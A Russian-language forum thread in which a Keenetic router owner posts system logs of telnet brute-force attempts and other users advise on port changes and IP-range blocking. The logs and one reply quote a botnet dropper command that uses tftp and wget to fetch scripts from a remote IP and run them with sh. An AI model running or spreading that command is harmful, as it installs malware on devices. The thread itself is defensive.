Jump to content
  • 0

Нежданные гости. Как быть, что делать?


xxxsadistxxx

Question

Keenetic II (2.10.A.5.0-7)

На свою голову, заглянул в журнал. А там!...мама роди меня обратно. Что и как, сам не осиливаю понять. Помогите, кто в курсе, а то сталкивался с таким.

В общем, что-то/кто-то, безудержно "любит" мой роутер. То и дело, роутер банит различные ip, которые домогаются 23-й порт (telnet), круглосуточно. Как давно, трудно сказать. Думал прошивка новая, потом одумался грешить на неё. На 2.09 видел тоже самое. Да и с год назад, на 2.06, но тогда или не придал значения, да и проблема исчезала, какое-то время, любовался чистым журналом.

А сейчас зацепился, спать не могу, зная, что кто-то "теребонькает" мой роутер.

Порты открыты/закрыты. Все одно. Когда убрал из правил (закрыл), доступ к этому порту, на время пропали строчки с попыткой залогиниться "admin", "shell", "sh"...а потом все равно полезли.

Link to comment
Share on other sites

7 answers to this question

Recommended Posts

  • 0


Aug  9 01:33:31 ndm: Core::Server: client disconnected.
[E] Aug  9 01:33:32 ndm: Core::Authenticator: no such user: "shell".
Aug  9 01:34:05 telnetd: a new connection from ::ffff:85.105.135.145 accepted.
Aug  9 01:34:05 ndm: Core::Server: started Session /var/run/ndm.core.socket.
Aug  9 01:34:05 ndm: Core::Authenticator: generating.
[E] Aug  9 01:34:08 ndm: Core::Authenticator: access to "cli" denied for user "root".
[E] Aug  9 01:34:10 ndm: Core::Authenticator: no such user: "enable".
Aug  9 01:34:12 ndm: Netfilter::Util::BfdManager: ban remote host 85.105.135.145 for 15 minutes.
[E] Aug  9 01:34:13 ndm: Core::Authenticator: no such user: "shell".
Aug  9 01:35:28 telnetd: a new connection from ::ffff:223.246.176.248 accepted.
Aug  9 01:35:28 ndm: Core::Server: started Session /var/run/ndm.core.socket.
Aug  9 01:35:28 ndm: Core::Authenticator: generating.
Aug  9 01:35:31 ndm: Core::Authenticator: generating.
[E] Aug  9 01:35:31 ndm: Core::Authenticator: user "admin": invalid password.
[E] Aug  9 01:35:34 ndm: Core::Authenticator: no such user: "enable".
[E] Aug  9 01:35:37 ndm: Core::Authenticator: no such user: "shell".
Aug  9 01:36:11 telnetd: ::ffff:223.246.176.248 client disconnected.
Aug  9 01:36:11 ndm: Core::Server: client disconnected.
Aug  9 01:36:11 telnetd: a new connection from ::ffff:223.246.176.248 accepted.
Aug  9 01:36:11 ndm: Core::Server: started Session /var/run/ndm.core.socket.
Aug  9 01:36:11 ndm: Core::Authenticator: generating.
[E] Aug  9 01:36:14 ndm: Core::Authenticator: access to "cli" denied for user "root".
[E] Aug  9 01:36:16 ndm: Core::Authenticator: no such user: "enable".
Aug  9 01:36:18 ndm: Netfilter::Util::BfdManager: ban remote host 223.246.176.248 for 15 minutes.
[E] Aug  9 01:36:20 ndm: Core::Authenticator: no such user: "shell".
Aug  9 01:36:54 telnetd: ::ffff:223.246.176.248 client disconnected.
Aug  9 01:36:54 ndm: Core::Server: client disconnected.
Aug  9 01:37:20 telnetd: a new connection from ::ffff:78.186.251.220 accepted.
Aug  9 01:37:20 ndm: Core::Server: started Session /var/run/ndm.core.socket.
Aug  9 01:37:20 ndm: Core::Authenticator: generating.
Aug  9 01:37:23 ndm: Core::Authenticator: generating.
[E] Aug  9 01:37:23 ndm: Core::Authenticator: user "admin": invalid password.
Aug  9 01:37:53 telnetd: ::ffff:78.186.251.220 client disconnected.
Aug  9 01:37:53 ndm: Core::Server: client disconnected.
Aug  9 01:40:33 telnetd: a new connection from ::ffff:120.55.190.59 accepted.
Aug  9 01:40:33 ndm: Core::Server: started Session /var/run/ndm.core.socket.
Aug  9 01:40:33 ndm: Core::Authenticator: generating.
[E] Aug  9 01:41:04 ndm: Core::Authenticator: access to "cli" denied for user "root".
[E] Aug  9 01:41:15 ndm: Core::Authenticator: no such user: "sh".
[E] Aug  9 01:41:22 ndm: Core::Authenticator: no such user: "cd /tmp || cd /mnt || cd /var; tftp -r tftp.sh -g 89.248.162.146; sh tftp.sh; wget http://89.248.162.146/bin.sh; sh bin.sh; busybox wget http://89.248.162.146/bin1.sh; sh bin1.sh".
[E] Aug  9 01:41:35 ndm: Core::Syslog: last message repeated 2 times.
Aug  9 01:41:37 ndm: Netfilter::Util::BfdManager: ban remote host 120.55.190.59 for 15 minutes.
Aug  9 01:41:37 ndm: Core::Server: client disconnected.
Aug  9 01:41:37 telnetd: ::ffff:120.55.190.59 client disconnected.
Aug  9 01:42:28 telnetd: a new connection from ::ffff:178.239.212.223 accepted.
Aug  9 01:42:28 ndm: Core::Server: started Session /var/run/ndm.core.socket.
Aug  9 01:42:28 ndm: Core::Authenticator: generating.
Aug  9 01:42:31 ndm: Core::Authenticator: generating.
[E] Aug  9 01:42:31 ndm: Core::Authenticator: user "admin": invalid password.
[E] Aug  9 01:42:34 ndm: Core::Authenticator: no such user: "enable".
[E] Aug  9 01:42:36 ndm: Core::Authenticator: no such user: "shell".
Aug  9 01:43:10 telnetd: ::ffff:178.239.212.223 client disconnected.
Aug  9 01:43:10 ndm: Core::Server: client disconnected.
Aug  9 01:43:10 telnetd: a new connection from ::ffff:178.239.212.223 accepted.
Aug  9 01:43:10 ndm: Core::Server: started Session /var/run/ndm.core.socket.
Aug  9 01:43:10 ndm: Core::Authenticator: generating.
[E] Aug  9 01:43:12 ndm: Core::Authenticator: access to "cli" denied for user "root".
[E] Aug  9 01:43:15 ndm: Core::Authenticator: no such user: "enable".
Aug  9 01:43:17 ndm: Netfilter::Util::BfdManager: ban remote host 178.239.212.223 for 15 minutes.
[E] Aug  9 01:43:18 ndm: Core::Authenticator: no such user: "shell".
Aug  9 01:43:51 telnetd: ::ffff:178.239.212.223 client disconnected.
Aug  9 01:43:51 ndm: Core::Server: client disconnected.

Edited by xxxsadistxxx
Попытка убрать под спойлер
Link to comment
Share on other sites

  • 0
46 минут назад, xxxsadistxxx сказал:

Когда убрал из правил (закрыл), доступ к этому порту, на время пропали строчки с попыткой залогиниться "admin", "shell", "sh"...а потом все равно полезли.

Если порт закрыт - откуда строчкам взяться?

Если уж так надо светить морду наружу, ставьте нестандртные порты, условно из 10000+ - ботов, которые долбятся по дефолтным портам, не счесть

  • Upvote 1
Link to comment
Share on other sites

  • 0

Мне вот интересно какое отношение ко всему этому имеет

[E] Aug  9 01:41:22 ndm: Core::Authenticator: no such user: "cd /tmp || cd /mnt || cd /var; tftp -r tftp.sh -g 89.248.162.146; sh tftp.sh; wget http://89.248.162.146/bin.sh; sh bin.sh; busybox wget http://89.248.162.146/bin1.sh; sh bin1.sh".

скачать tftp.sh запустить его и далее два bin (это html страница для вывода на экрна информации про Wowza Media Server)

 

Link to comment
Share on other sites

  • 0

Я поступил  топорно)))) ...правда у меня открыт 21 порт. Процентов на 90 снизилась краснота в логах. )))))) 

Тупо сделал фильтр в МСЭ  на входящем интерфейсе. ...ну как вариант сойдёт.))) В фильтре в большей массе Китай и Индия.

 

Скрытый текст

access-list _WEBADMIN_PPPoE0
    deny icmp 0.0.0.0 0.0.0.0 0.0.0.0 0.0.0.0
    deny ip 2.134.128.0 255.255.240.0 0.0.0.0 0.0.0.0
    deny ip 14.32.0.0 255.224.0.0 0.0.0.0 0.0.0.0
    deny ip 37.151.136.0 255.255.252.0 0.0.0.0 0.0.0.0
    deny ip 39.32.0.0 255.224.0.0 0.0.0.0 0.0.0.0
    deny ip 43.248.68.0 255.255.252.0 0.0.0.0 0.0.0.0
    deny ip 43.250.156.0 255.255.252.0 0.0.0.0 0.0.0.0
    deny ip 43.250.164.0 255.255.252.0 0.0.0.0 0.0.0.0
    deny ip 45.55.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 45.64.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 45.65.0.0 255.255.240.0 0.0.0.0 0.0.0.0
    deny ip 45.112.0.0 255.240.0.0 0.0.0.0 0.0.0.0
    deny ip 46.219.16.0 255.255.248.0 0.0.0.0 0.0.0.0
    deny ip 47.8.0.0 255.254.0.0 0.0.0.0 0.0.0.0
    deny ip 47.11.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 49.33.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 49.34.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 49.35.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 49.146.0.0 255.255.224.0 0.0.0.0 0.0.0.0
    deny ip 59.95.192.0 255.255.240.0 0.0.0.0 0.0.0.0
    deny ip 59.96.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 59.97.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 60.191.32.0 255.255.240.0 0.0.0.0 0.0.0.0
    deny ip 60.218.0.0 255.254.0.0 0.0.0.0 0.0.0.0
    deny ip 61.2.240.0 255.255.240.0 0.0.0.0 0.0.0.0
    deny ip 71.6.146.0 255.255.255.0 0.0.0.0 0.0.0.0
    deny ip 80.82.77.0 255.255.255.0 0.0.0.0 0.0.0.0
    deny ip 85.97.205.0 255.255.255.0 0.0.0.0 0.0.0.0
    deny ip 87.253.32.0 255.255.224.0 0.0.0.0 0.0.0.0
    deny ip 91.140.188.0 255.255.255.0 0.0.0.0 0.0.0.0
    deny ip 94.23.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 94.102.49.0 255.255.255.0 0.0.0.0 0.0.0.0
    deny ip 95.142.88.0 255.255.248.0 0.0.0.0 0.0.0.0
    deny ip 103.57.140.0 255.255.252.0 0.0.0.0 0.0.0.0
    deny ip 103.66.232.0 255.255.252.0 0.0.0.0 0.0.0.0
    deny ip 103.208.116.0 255.255.252.0 0.0.0.0 0.0.0.0
    deny ip 103.216.144.0 255.255.252.0 0.0.0.0 0.0.0.0
    deny ip 104.152.52.0 255.255.252.0 0.0.0.0 0.0.0.0
    deny ip 104.171.118.0 255.255.255.0 0.0.0.0 0.0.0.0
    deny ip 106.75.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 114.112.104.0 255.255.252.0 0.0.0.0 0.0.0.0
    deny ip 117.192.0.0 255.240.0.0 0.0.0.0 0.0.0.0
    deny ip 117.208.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 117.212.0.0 255.252.0.0 0.0.0.0 0.0.0.0
    deny ip 117.241.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 118.193.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 120.132.0.0 255.255.240.0 0.0.0.0 0.0.0.0
    deny ip 122.53.98.224 255.255.255.224 0.0.0.0 0.0.0.0
    deny ip 122.154.224.0 255.255.224.0 0.0.0.0 0.0.0.0
    deny ip 122.173.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 122.224.153.0 255.255.255.0 0.0.0.0 0.0.0.0
    deny ip 125.18.128.0 255.255.255.0 0.0.0.0 0.0.0.0
    deny ip 137.59.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 139.162.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 157.48.0.0 255.252.0.0 0.0.0.0 0.0.0.0
    deny ip 163.0.0.0 255.0.0.0 0.0.0.0 0.0.0.0
    deny ip 164.52.0.0 255.255.128.0 0.0.0.0 0.0.0.0
    deny ip 168.1.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 172.104.0.0 255.254.0.0 0.0.0.0 0.0.0.0
    deny ip 175.100.128.0 255.255.240.0 0.0.0.0 0.0.0.0
    deny ip 178.89.8.0 255.255.248.0 0.0.0.0 0.0.0.0
    deny ip 182.64.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 182.176.0.0 255.240.0.0 0.0.0.0 0.0.0.0
    deny ip 183.87.32.0 255.255.224.0 0.0.0.0 0.0.0.0
    deny ip 183.128.0.0 255.240.0.0 0.0.0.0 0.0.0.0
    deny ip 183.204.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 196.52.0.0 255.252.0.0 0.0.0.0 0.0.0.0
    deny ip 198.20.64.0 255.255.192.0 0.0.0.0 0.0.0.0
    deny ip 202.62.64.0 255.255.224.0 0.0.0.0 0.0.0.0
    deny ip 203.100.64.0 255.255.240.0 0.0.0.0 0.0.0.0
    deny ip 202.131.114.0 255.255.255.0 0.0.0.0 0.0.0.0
    deny ip 203.134.198.0 255.255.255.0 0.0.0.0 0.0.0.0
    deny ip 204.93.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    deny ip 209.126.136.0 255.255.255.224 0.0.0.0 0.0.0.0
    deny ip 211.138.0.0 255.255.240.0 0.0.0.0 0.0.0.0
    deny ip 212.97.0.0 255.255.224.0 0.0.0.0 0.0.0.0
    deny ip 220.225.0.0 255.255.0.0 0.0.0.0 0.0.0.0
    permit tcp 0.0.0.0 0.0.0.0 0.0.0.0 0.0.0.0 port eq 21

 

Edited by MDP
Link to comment
Share on other sites

  • 0
6 часов назад, KorDen сказал:

Если порт закрыт - откуда строчкам взяться?

Вот я сам не пойму. Когда закрыл порт, на время пропали строки с логином и были только строки об отказе доступа (думаю логична фиксация этого, ведь я закрыл порт, но бот не перестал же стучаться). А через время снова обнаружил попытки залогиниться и тут стало страшно :D

3 часа назад, vasek00 сказал:

скачать tftp.sh запустить его и далее два bin (это html страница для вывода на экрна информации про Wowza Media Server)

А можно подробнее, что это вообще такое (я не знаток). Это попытка пробиться в роутер через тот же telnet, но более серьёзная? Вроде как пытались смонтировать директории мозга и скопировать туда скрипт неизвестной байды? Высшая наглость))

Скачать скачаю, не уверен что запущу/сделаю с ним, то что надо. Если есть возможность помочь, могу создать учетку и дать доступ прямой или могу установить тимвивер (мало вероятно что запомню все увиденное, но интересно :) )

Две показанные темы прочитал, немного успокоился, в том плане что далеко не одинок, но сам факт таких ботов и в таком кол-ве удручает (это даже открытие для меня, я конечно не ребёнок и знаю о таких вещах, но о масштабах не подозревал). И сделать ничего нельзя, на уровне провайдеров, иначе вся планета в бане будет париться. Вот она обратная сторона, всех этих анонимайзеров и сетей по типу ТОРа. Кому-то во благо, а кому-то чужие роутеры "теребонькать".

59 минут назад, MDP сказал:

Тупо сделал фильтр в МСЭ

Видимо да, придётся как все, юзать другие порты и наполнять ручками, свой бан лист, периодически вылавливая IP из журнала.

Link to comment
Share on other sites

  • 0
6 минут назад, xxxsadistxxx сказал:

 

Видимо да, придётся как все, юзать другие порты и наполнять ручками, свой бан лист, периодически вылавливая IP из журнала.

Если китайские и индийские товарищи не нужны...то можете смело брать кусок этого фЫльтра и приляпать себе)))) 

А так конечно непродуманно как-то происходила выдача IPv4 для разных стран мира...диапазоны все вперемешку.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Answer this question...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...